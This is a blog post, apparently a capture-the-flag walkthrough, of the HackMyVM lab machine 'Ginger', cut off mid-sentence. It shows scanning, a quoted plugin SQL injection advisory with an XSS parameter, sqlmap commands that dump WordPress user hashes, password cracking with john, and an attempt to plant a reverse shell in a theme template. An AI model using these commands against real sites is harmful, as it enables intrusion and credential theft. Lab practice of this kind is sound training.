{"id":893,"date":"2025-06-19T13:01:26","date_gmt":"2025-06-19T05:01:26","guid":{"rendered":"http:\/\/162.14.82.114\/?p=893"},"modified":"2025-06-19T13:01:26","modified_gmt":"2025-06-19T05:01:26","slug":"hmv-_-ginger","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/893\/06\/19\/2025\/","title":{"rendered":"hmv[-_-] Ginger"},"content":{"rendered":"<h1>Ginger<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300864.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300864.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619011023544\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300866.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300866.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619074140801\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog         :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nI scanned my computer so many times, it thinks we&#039;re dating.\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.10.104:22\nOpen 192.168.10.104:80\n\nPORT   STATE SERVICE REASON         VERSION\n22\/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDhemxEZcm98GFwIRozVUePnC+Cejni5lScAa7ha5neDlWQT2e6dbubOkddku\/qgtgY4\/kw\/pGPh7oTqHg9WKHTMqTAzdN0DDaU\/5twewwMf6s9ERuuYYieP7mzjsX2APhOr23CFWVr37Y+mQ\/A4J0ODizpr\/mggCCi6kqHqyRWgcPG98AVJ9IjPehVkptQdLpQlSOV8EzJClu6tBInWzxtGi5v0B94lMYRDXqZE9Z1wCSh9oU0HnwRwfFqB0dcOH+kDZVLYi06aiHKXkKgSFM3G6LJQY8ad4FCEc7TU+agLRPHFUPFqqPbf9hbDD7MUdR4pXEQtJ1p\/D\/9rdbBg1Sp\n|   256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB+zmcUltQUYUVvvfWqtUjdFpCh0IkOnPjmcctTpnXS7MWK37n6h9DEq4WNsHmauyKEuRnml5mOLUbNIZHHUBgY=\n|   256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHNArrcR981CzORruPnEn\/opg56t7SFktwnhZzGpXcfE\n80\/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))\n|_http-title: Apache2 Debian Default Page: It works\n|_http-server-header: Apache\/2.4.38 (Debian)\n| http-methods: \n|_  Supported Methods: HEAD GET POST OPTIONS\nMAC Address: 08:00:27:F1:09:3C (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html,zip\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.10.104\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              html,zip,php,txt\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html                (Status: 403) [Size: 279]\n\/index.html           (Status: 200) [Size: 10701]\n\/.php                 (Status: 403) [Size: 279]\n\/wordpress            (Status: 301) [Size: 320] [--&gt; http:\/\/192.168.10.104\/wordpress\/]\n\/latest.zip           (Status: 200) [Size: 16866701]\n\/.php                 (Status: 403) [Size: 279]\n\/.html                (Status: 403) [Size: 279]\n\/server-status        (Status: 403) [Size: 279]<\/code><\/pre>\n<h3>wordpress\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ cmseek -u http:\/\/192.168.10.104\/wordpress\/\n\n[+]  CMS Detection And Deep Scan  [+] \n\n[i] Scanning Site: http:\/\/192.168.10.104\/wordpress\/\n[*] CMS Detected, CMS ID: wp, Detection method: header\n[*] Version Detected, WordPress Version 5.7.2\n[i] Checking user registration status\n[i] Starting passive plugin enumeration\n[x] No plugins enumerated!\n[i] Starting passive theme enumeration\n[*] 1 theme detected!\n[i] Starting Username Harvest\n[i] Harvesting usernames from wp-json api\n[!] Json api method failed trying with next\n[i] Harvesting usernames from jetpack public api\n[!] No results from jetpack api... maybe the site doesn&#039;t use jetpack\n[i] Harvesting usernames from wordpress author Parameter\n[*] Found user from source code: webmaster\n[*] 1 Usernames was enumerated\n[i] Checking version vulnerabilities using wpvulns.com\n[x] Error Retriving data from wpvulndb\n\n ___ _  _ ____ ____ ____ _  _\n|    |\\\/| [__  |___ |___ |_\/  by @r3dhax0r\n|___ |  | ___| |___ |___ | \\_ Version 1.1.3 K-RONA\n\n [+]  Deep Scan Results  [+] \n\n \u250f\u2501Target: 192.168.10.104\n \u2503\n \u2520\u2500\u2500 CMS: WordPress\n \u2503    \u2502\n \u2503    \u251c\u2500\u2500 Version: 5.7.2\n \u2503    \u2570\u2500\u2500 URL: https:\/\/wordpress.org\n \u2503\n \u2520\u2500\u2500[WordPress Deepscan]\n \u2503    \u2502\n \u2503    \u251c\u2500\u2500 Readme file found: http:\/\/192.168.10.104\/wordpress\/\/readme.html\n \u2503    \u251c\u2500\u2500 License file: http:\/\/192.168.10.104\/wordpress\/\/license.txt\n \u2503    \u2502\n \u2503    \u251c\u2500\u2500 Themes Enumerated: 1\n \u2503    \u2502    \u2502\n \u2503    \u2502    \u2570\u2500\u2500 Theme: twentytwentyone\n \u2503    \u2502        \u2502\n \u2503    \u2502        \u251c\u2500\u2500 Version: 1.3\n \u2503    \u2502        \u2570\u2500\u2500 URL: http:\/\/192.168.10.104\/wordpress\/\/wp-content\/themes\/twentytwentyone\n \u2503    \u2502\n \u2503    \u2502\n \u2503    \u251c\u2500\u2500 Usernames harvested: 1\n \u2503    \u2502    \u2570\u2500\u2500 webmaster\n \u2503    \u2502\n \u2503\n \u2520\u2500\u2500 Result: \/home\/kali\/temp\/Ginger\/Result\/192.168.10.104_wordpress\/cms.json\n \u2503\n \u2517\u2501Scan Completed in 1.49 Seconds, using 45 Requests\n\n CMSeeK says ~ au revoir<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ wpscan --url http:\/\/$IP\/wordpress -e u vp --api-token xxxxxxxxxxxxxx\n[+] Enumerating Users (via Passive and Aggressive Methods)\n Brute Forcing Author IDs - Time: 00:00:00 &lt;===============================================================================================================&gt; (10 \/ 10) 100.00% Time: 00:00:00\n[i] User(s) Identified:\n\n[+] webmaster\n | Found By: Rss Generator (Passive Detection)\n | Confirmed By:\n |  Wp Json Api (Aggressive Detection)\n |   - http:\/\/192.168.10.104\/wordpress\/index.php\/wp-json\/wp\/v2\/users\/?per_page=100&amp;page=1\n |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n |  Login Error Messages (Aggressive Detection)<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u654f\u611f\u76ee\u5f55<\/h3>\n<p>\u53d1\u73b0\u4e86\u4e00\u4e2a\u538b\u7f29\u5305\uff0c\u5c1d\u8bd5\u89e3\u538b\uff1a<\/p>\n<pre><code class=\"language-bash\"># wget http:\/\/$IP\/latest.zip\n# unzip latest.zip\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ tree wordpress\n---------------\n293 directories, 2184 files<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u4e00\u5b9a\u7684\u4fe1\u606f\u641c\u96c6\uff0c\u4f46\u662f\u6587\u4ef6\u5b9e\u5728\u592a\u591a\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300867.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300867.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619081602187\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>wordpress\u63d2\u4ef6sql\u6ce8\u5165\u6f0f\u6d1e<\/h3>\n<p>\u611f\u89c9\u50cf\u662f\u9ed8\u8ba4\u7684\u3002\u3002\u3002\u3002\u3002\u5c1d\u8bd5\u641c\u7d22\u770b\u4e00\u4e0b\u63d2\u4ef6\uff0c\u518d\u4e0d\u884c\u53ea\u80fd\u5c1d\u8bd5\u4fe1\u606f\u641c\u96c6\u6216\u8005sql\u6ce8\u5165\u767b\u5f55\u754c\u9762\u6216\u8005\u7206\u7834\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\"># wpscan --url http:\/\/$IP\/wordpress -e vp  --plugins-detection mixed --disable-tls-checks --api-token xxxxxxxxxx\n[i] Plugin(s) Identified:\n\n[+] cp-multi-view-calendar\n | Location: http:\/\/192.168.10.104\/wordpress\/wp-content\/plugins\/cp-multi-view-calendar\/\n | Latest Version: 1.4.32\n | Last Updated: 2025-04-14T12:46:00.000Z\n | Readme: http:\/\/192.168.10.104\/wordpress\/wp-content\/plugins\/cp-multi-view-calendar\/README.txt\n | [!] Directory listing is enabled\n |\n | Found By: Known Locations (Aggressive Detection)\n |  - http:\/\/192.168.10.104\/wordpress\/wp-content\/plugins\/cp-multi-view-calendar\/, status: 200\n |\n | [!] 6 vulnerabilities identified:\n |\n | [!] Title: CP Multi View Event Calendar &lt;= 1.0.1 - SQL Injection\n |     Fixed in: 1.0.2\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/22664ce3-6321-42af-9382-c2d82b5640d7\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2014-8586\n |      - https:\/\/www.exploit-db.com\/exploits\/35073\/\n |      - https:\/\/packetstormsecurity.com\/files\/128814\/\n |\n | [!] Title: CP Multi View Event Calendar &lt;= 1.1.4 - SQL Injection &amp; XSS\n |     Fixed in: 1.1.5\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/50db43be-9fdb-4b5f-bba5-4c0d62689dbf\n |      - https:\/\/www.exploit-db.com\/exploits\/36243\/\n |      - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_cp_calendar_sqli\/\n |\n | [!] Title: CP Multi View Event Calendar &lt;= 1.1.7 - Unauthenticated SQL Injection\n |     Fixed in: 1.1.8\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/3bf2665d-2e2d-4cc4-ac5d-7300e9cb1c11\n |      - https:\/\/www.exploit-db.com\/exploits\/37560\/\n |\n | [!] Title: Calendar Event Multi View &lt; 1.4.01 - Unauthenticated Reflected Cross-Site Scripting (XSS)\n |     Fixed in: 1.4.01\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/3c5a5187-42b3-4f88-9b0e-4fdfa1c39e86\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-24498\n |      - https:\/\/plugins.trac.wordpress.org\/changeset\/2557721\/cp-multi-view-calendar\n |\n | [!] Title: Calendar Event Multi View &lt; 1.4.07 - Unauthenticated Arbitrary Event Creation to Stored XSS\n |     Fixed in: 1.4.07\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/95f92062-08ce-478a-a2bc-6d026adf657c\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2022-2846\n |\n | [!] Title: Calendar Event Multi View &lt; 1.4.07 - Unauthenticated Arbitrary Event Deletion\n |     Fixed in: 1.4.07\n |     Reference: https:\/\/wpscan.com\/vulnerability\/5f191d25-833b-4d8d-a4ff-d180a326dd82\n |\n | The version could not be determined.<\/code><\/pre>\n<p>\u67e5\u770b<code>http:\/\/192.168.10.104\/wordpress\/wp-content\/plugins\/cp-multi-view-calendar\/README.txt<\/code>\uff0c\u53d1\u73b0\u5176\u7248\u672c\u5f88\u4f4e\uff0c\u5c1d\u8bd5\u641c\u7d22\u5229\u7528\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300868.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300868.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619083153163\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ searchsploit -m php\/webapps\/36243.txt\n  Exploit: WordPress Plugin cp-multi-view-calendar 1.1.4 - SQL Injection\n      URL: https:\/\/www.exploit-db.com\/exploits\/36243\n     Path: \/usr\/share\/exploitdb\/exploits\/php\/webapps\/36243.txt\n    Codes: OSVDB-119277, OSVDB-119276, OSVDB-118336, OSVDB-118324\n Verified: True\nFile Type: ASCII text\nCopied to: \/home\/kali\/temp\/Ginger\/36243.txt\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ cat 36243.txt \n# Exploit Title: WordPress: cp-multi-view-calendar.1.1.4  [SQL Injection\nvulnerabilities]\n# Date: 2015-02-28\n# Google Dork: Index of \/wordpress\/wp-content\/plugins\/cp-multi-view-calendar\n# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]\n# Vendor Homepage: http:\/\/wordpress.dwbooster.com\/\n# Software Link:\nhttps:\/\/downloads.wordpress.org\/plugin\/cp-multi-view-calendar.1.1.4.zip\n# Version: 1.1.5\n# Tested on: windows 7 ultimate + sqlmap 0.9. It&#039;s php aplication\n# OWASP Top10: A1-Injection\n# Mitigations: Upgrade to version 1.1.5\n\nGreetz to Christian Uriel Mondragon Zarate\n\nVideo demo of unauthenticated user sqli explotation vulnerability :\n\n###################################################################\n\nADMIN PAGE SQL INJECTION\n-------------------------------------------------\n\nhttp:\/\/localhost\/wordpress\/wp-admin\/admin-ajax.php?action=ajax_add_calendar\n\nsqlinjection in post parameter viewid\n\n-------------------------------------------------------------------\n\nhttp:\/\/localhost\/wordpress\/wp-admin\/admin-ajax.php?action=ajax_delete_calendar\n\nsqlinjection in post parameter id\n\n########################################\n\nUNAUTENTICATED SQL INJECTION\n-----------------------------------------------------------------\n\nhttp:\/\/localhost\/wordpress\/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1\n\nsql injection in id parameter\n\n-----------------------------------------------------------------------\n\nhttp:\/\/localhost\/wordpress\/?action=data_management&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1\n\ndatapost viewtype=list&amp;list_order=asc vuln variable list_order\n\n################################################################\n\nCROSSITE SCRIPTING VULNERABILITY\n----------------------------------------------------------\n\nhttp:\/\/localhost\/wordpress\/?action=data_management&cpmvc_do_action=mvparse&weekstartday=alert(12)&f=edit&id=1\n\ncrosite script weekstartday parameter\n\n###################################################\n\n==================================\n\ntime-line\n\n26-02-2015: vulnerabilities found\n27-02-2015: reported to vendor\n28-02-2015: release new cp-multi-view-calendar version 1.1.4\n28-02-2015: full disclousure\n\n===================================<\/code><\/pre>\n<p>\u82e5\u5e72 sql \u6ce8\u5165\u6f0f\u6d1e\uff0c\u968f\u4fbf\u627e\u4e00\u4e2a\u8fdb\u884c\u6d4b\u8bd5\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ sqlmap -u &quot;http:\/\/$IP\/wordpress\/?action=data_management&amp;cpmvc_do_action=mvparse&amp;f=edit&amp;id=1&quot; --batch --dbs\n\nGET parameter &#039;id&#039; is vulnerable. Do you want to keep testing the others (if any)? [y\/N] N\nsqlmap identified the following injection point(s) with a total of 271 HTTP(s) requests:\n---\nParameter: id (GET)\n    Type: time-based blind\n    Title: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)\n    Payload: action=data_management&amp;cpmvc_do_action=mvparse&amp;f=edit&amp;id=1 AND (SELECT 9875 FROM (SELECT(SLEEP(5)))sicY)\n---\n\navailable databases [2]:\n[*] information_schema\n[*] wordpress_db\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ sqlmap -u &quot;http:\/\/$IP\/wordpress\/?action=data_management&amp;cpmvc_do_action=mvparse&amp;f=edit&amp;id=1&quot; --batch -D wordpress_db --tables\n\n[16 tables]\n+------------------------+\n| wp_commentmeta         |\n| wp_comments            |\n| wp_dc_mv_calendars     |\n| wp_dc_mv_configuration |\n| wp_dc_mv_events        |\n| wp_dc_mv_views         |\n| wp_links               |\n| wp_options             |\n| wp_postmeta            |\n| wp_posts               |\n| wp_term_relationships  |\n| wp_term_taxonomy       |\n| wp_termmeta            |\n| wp_terms               |\n| wp_usermeta            |\n| wp_users               |\n+------------------------+\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ sqlmap -u &quot;http:\/\/$IP\/wordpress\/?action=data_management&amp;cpmvc_do_action=mvparse&amp;f=edit&amp;id=1&quot; --batch -D wordpress_db -T wp_users --dump\nDatabase: wordpress_db\nTable: wp_users\n[1 entry]\n+----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+\n| ID | user_url                      | user_pass                          | user_email          | user_login | user_status | display_name | user_nicename | user_registered     | user_activation_key |\n+----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+\n| 1  | http:\/\/192.168.0.14\/wordpress | $P$BsyLMheEjjRPfxertXBQWm6Nq8.YBr. | webmaster@gmail.com | webmaster  | 0           | webmaster    | webmaster     | 2021-06-02 05:28:40 | &lt;blank&gt;             |\n+----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u7206\u7834<code>webmaster:$P$BsyLMheEjjRPfxertXBQWm6Nq8.YBr.<\/code>\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ hash-identifier\n   #########################################################################\n   #     __  __                     __           ______    _____           #\n   #    \/\\ \\\/\\ \\                   \/\\ \\         \/\\__  _\\  \/\\  _ `\\         #\n   #    \\ \\ \\_\\ \\     __      ____ \\ \\ \\___     \\\/_\/\\ \\\/  \\ \\ \\\/\\ \\        #\n   #     \\ \\  _  \\  \/&#039;__`\\   \/ ,__\\ \\ \\  _ `\\      \\ \\ \\   \\ \\ \\ \\ \\       #\n   #      \\ \\ \\ \\ \\\/\\ \\_\\ \\_\/\\__, `\\ \\ \\ \\ \\ \\      \\_\\ \\__ \\ \\ \\_\\ \\      #\n   #       \\ \\_\\ \\_\\ \\___ \\_\\\/\\____\/  \\ \\_\\ \\_\\     \/\\_____\\ \\ \\____\/      #\n   #        \\\/_\/\\\/_\/\\\/__\/\\\/_\/\\\/___\/    \\\/_\/\\\/_\/     \\\/_____\/  \\\/___\/  v1.2 #\n   #                                                             By Zion3R #\n   #                                                    www.Blackploit.com #\n   #                                                   Root@Blackploit.com #\n   #########################################################################\n--------------------------------------------------\n HASH: $P$BsyLMheEjjRPfxertXBQWm6Nq8.YBr.\n\nPossible Hashs:\n[+] MD5(WordPress)\n--------------------------------------------------\n HASH: ^C\n\n        Bye!<\/code><\/pre>\n<p>\u5c1d\u8bd5\u7206\u7834\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ echo &#039;$P$BsyLMheEjjRPfxertXBQWm6Nq8.YBr.&#039; &gt; hash\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ john hash --wordlist=\/usr\/share\/wordlists\/rockyou.txt \nUsing default input encoding: UTF-8\nLoaded 1 password hash (phpass [phpass ($P$ or $H$) 128\/128 SSE2 4x3])\nCost 1 (iteration count) is 8192 for all loaded hashes\nWill run 4 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\nsanitarium       (?)     \n1g 0:00:00:04 DONE (2025-06-18 21:13) 0.2008g\/s 20086p\/s 20086c\/s 20086C\/s shunda..rosnah\nUse the &quot;--show --format=phpass&quot; options to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n<p>\u62ff\u5230\u5bc6\u7801\uff01\uff01\uff01\uff01\u4f7f\u7528\u51ed\u8bc1<code>webmaster:sanitarium<\/code>\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<code>http:\/\/192.168.10.104\/wordpress\/wp-login.php<\/code><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300869.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300869.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619091611105\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300870.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300870.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619091628763\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h3>\u53cd\u5f39shell<\/h3>\n<p>\u5c1d\u8bd5\u4fee\u6539<code>php<\/code>\u914d\u7f6e\u6587\u4ef6\u4f7fshell\u5f39\u56de\u6765\uff0c\u6211\u9009\u62e9\u7684\u662f\u4e3b\u9898\u6a21\u677f\u4e2d\u7684<code>404<\/code>\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300871.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300871.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619092052723\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u63d2\u5165\u53cd\u5f39shell\uff0c\u4f46\u662f\u663e\u793a\uff1a<\/p>\n<blockquote>\n<p>Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using 